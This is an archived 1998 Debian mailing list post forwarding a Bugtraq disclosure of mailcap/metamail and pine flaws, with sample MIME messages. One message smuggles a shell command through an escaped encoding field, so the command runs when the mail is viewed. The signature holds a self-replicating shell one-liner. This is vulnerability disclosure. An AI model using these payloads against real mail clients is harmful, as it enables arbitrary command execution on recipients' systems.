RE: mailrc and pine security holes

To: debian-user@lists.debian.org
Subject: RE: mailrc and pine security holes
From: Andreas Mueller <amu@sun.tuerkiye.net>
Date: Tue, 7 Apr 1998 11:05:54 +0300
Message-id: <19980407110554.25244@sun>

hi 

only 4 info :)

-----Forwarded message from Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>-----
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From:	Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
Subject:      mailrc and pine security holes
To:	BUGTRAQ@NETSPACE.ORG

Many of mailcap-compatible unix mail clients have several security holes.
Mailcap mechanism is usually so poorly implemented that it's possible
to perform wida range of attacks - from 'harmless' messing on screen,
through executing specific commands with arbitrary parameters,
even to executing *arbitrary* commands via e-mail message.

Here are examples, both tested under Linux RH 5.0 distribution (mailcap
1.0.6, pine 3.96):


========================================
Example 1 (light) - pine 3.96 confusion
=======================================

Following example demostrates how to cause a few 'mostly harmless'
errors due to the improper expansion of ` character by pine - it's
just annoying, because you can't view this mail properly, but I
have no idea if it's exploitable:

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: text/plain;
        charset="crashme`"
Content-Transfer-Encoding: quoted-printable

Hellow!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ***


===============================================
Example 2 (heavy) - execution of arbitrary code
===============================================

That's something even more dangerous - following MIME mail, when viewed,
executes 'touch /tmp/BIG_HOLE' (bug lies in metamail script):

**** SAMPLE MIME MESSAGE ****
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

------=_NextPart_000_0007_01BD5F09.B6797740
Content-Type: default;
        encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"
Content-Transfer-Encoding: quoted-printable

Hellow!!!

------=_NextPart_000_0007_01BD5F09.B6797740--
**** END OF EXAMPLE ****

_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]

-----End of forwarded message-----

-- 
Grusz 
	Andreas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|Andreas Mueller                                      Akdeniz-Koleji      |
|System-Administrator                              amu@akdenizk.com.tr    |
|Konyaalti Cad. Gündüz Apt. 19/15 07050 Antalya Work-Phone:0090-242-2481880|
|privat: amu@linux.de                          Privat: 0090-242-2482402   |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PGP Key Fingerprint = 58 BD 95 55 34 18 29 E8  AD 88 58 64 1F A4 7A 38


--
To UNSUBSCRIBE, email to debian-user-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

Reply to:

Prev by Date: Re: awk or sed?
Next by Date: Re: Problems creating a bootable Debian installation on a Jaz drive (fwd)
Previous by thread: Re: awk or sed?
Next by thread: exim 1.90-2: eximconfig doesn't work.
Index(es):
- Date
- Thread